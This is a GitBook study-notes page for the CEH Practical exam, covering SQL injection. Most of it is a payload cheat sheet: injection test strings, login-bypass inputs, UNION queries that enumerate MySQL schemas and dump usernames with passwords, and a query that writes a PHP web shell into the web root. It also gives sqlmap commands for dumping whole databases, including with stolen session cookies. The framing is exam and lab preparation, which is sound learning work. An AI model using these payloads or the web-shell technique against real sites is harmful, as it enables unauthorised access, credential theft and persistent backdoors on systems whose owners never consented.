Book of Eopi
  • 😍About the Author
  • πŸ€–ChatGPT for Cybersecurity
  • πŸ“˜CERTIFICATIONS
    • Certified Ethical Hacker (C|EH)(Practical)
      • Reconnaissance (Footprinting)
      • Scanning Networks
      • Vulnerability Analysis
      • System Hacking
      • Sniffing
      • SQL Injection
      • Remote code execution
      • Hacking Web Applications & Servers
        • Local and remote file inclusion
        • File upload bypass
        • Cross-site scripting
        • Cross-site request forgery
        • Server-side request forgery
      • Exploitation
        • Working with exploits
        • Password cracking
        • Metasploit
        • Buffer overflow
      • Cloud Computing
      • Cryptography
      • Mobile Pentesting Resources
      • Learning resources
  • 🏁My Hacking Materials
    • My Most Frequently Used Hacking Commands
    • RickdiculouslyEasy: 1 VulnHub WriteUp
    • Corrosion: 2 VulnHub WriteUp
    • Hackable: 3 VulnHub WriteUp
    • Empire: LupinOne Vulnhub WriteUp
  • 🐧101 Labs for Linux
    • πŸ’»Hardware and System Configuration
      • LAB 1 - Boot Sequence
  • πŸ”§Mod Nintendo Switch Game
    • πŸ”ΉPokΓ©mon Brilliant Diamond and Shining Pearl
      • πŸŸ₯Install mods on Nintendo Switch
      • 🟦Install mods on Yuzu/Ryujinx Emulator
      • πŸ” Custom font for PokΓ©mon BDSP
  • πŸ“–SHARE TΓ€I LIỆU NVSP
    • 1️⃣HỌC PHαΊ¦N 1
    • 2️⃣HỌC PHαΊ¦N 2
    • 3️⃣HỌC PHαΊ¦N 3
    • 4️⃣HỌC PHαΊ¦N 4
    • 5️⃣HỌC PHαΊ¦N 5 (chΖ°a hoΓ n thiện)
    • 6️⃣HỌC PHαΊ¦N 6
  • βš”οΈTα»•ng Hợp VΓ΅ LΓ’m 2
    • πŸ’°Server JX2 2014 - BαΊ£n Kinh Doanh
    • πŸ‘‘Server JX2 2014 - PhiΓͺn bαΊ£n Offline
    • πŸ‘‘Server JX2 2017 - PhiΓͺn BαΊ£n Offline
    • πŸ‘‘Server JX2 2021 - PhiΓͺn BαΊ£n Offline
Powered by GitBook
On this page
  • Introduction
  • Basics
  • SQL Injection Cheat Sheet
  • SQLMap
  • Damn Small SQLi Scanner
  • Basic technique
  • POST parameters
  • Bypassing authentication
  • Database enumeration
  • SQLmap
  • Passing tokens
  • REST-style URLs
  • Further reading
  1. CERTIFICATIONS
  2. Certified Ethical Hacker (C|EH)(Practical)

SQL Injection

Welcome to the SQL Injection module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

PreviousSniffingNextRemote code execution

Last updated 2 years ago

Introduction

SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists, or private customer details.

What is SQL?

SQL stands for Structured Query Language, which is a computer language for storing, manipulating, and retrieving data stored in a relational database. SQL is the standard language for Relational Database System. MS SQL Server uses T-SQL, Oracle uses PL/SQL, the MS Access version of SQL is called JET SQL (native format), etc.

Basics

  • You can learn SQL Injection basics from the given link below.

SQL Injection Cheat Sheet

SQLMap

  • sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

  • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

After gaining knowledge of SQLMap, you should need to know:

Damn Small SQLi Scanner

Basic technique

Stick ' in a parameter and see if it throws a database error (and note what kind).

Another simple test:

' or '1'='1

Other tests:

-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

POST parameters

You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.

Bypassing authentication

If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter:

username' or 1=1;#
username'-

Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.

Get version:

http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5

You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error:

http://[host]/inject.php?id=54 order by 1
http://[host]/inject.php?id=54 order by 2
http://[host]/inject.php?id=54 order by 3

Get the current user:

http://[host]/inject.php?id=1 union all select 1,2,3,user(),5

See all tables:

http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables

Get column names for a specified table:

http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'

Get usernames and passwords (0x3a means :):

http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users

You might be able to write to system files depending on permission levels using MySQL's INTO OUTFILE function to create a php shell in the web root:

http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

I suspect you could inject a full reverse shell in there too...

SQLmap

Assuming you've tested a parameter with ' and it is injectable, run SQL map against the URL:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql

It may not run unless you specify the database type.

Get the databases:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql

Get the tables in a database:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]

Get the columns in a table:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]

Dump a table:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]

Passing tokens

If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the -r option:

sqlmap -r request.txt

If you just need to pass a cookie:

sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"

REST-style URLs

If your URLs have no parameters, you can still test them:

sqlmap -u "http://[host]/param1*/param2*"

Further reading

Damn Small SQLi Scanner (DSSS) is a fully functional vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

πŸ“˜
SQL injection
Gaining a reverse shell from SQL injection
SQL injection cheat sheet
Dumping a complete database using SQL injection
Hacking node.js and MongoDB
SQLmap tutorial
SQL Injection
What is SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy
SQL Injection Cheat Sheet
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolGitHub
GitHub Repo of SQLMap
GitHub - stamparm/DSSS: Damn Small SQLi ScannerGitHub
Logo
Logo
Logo
Logo
Logo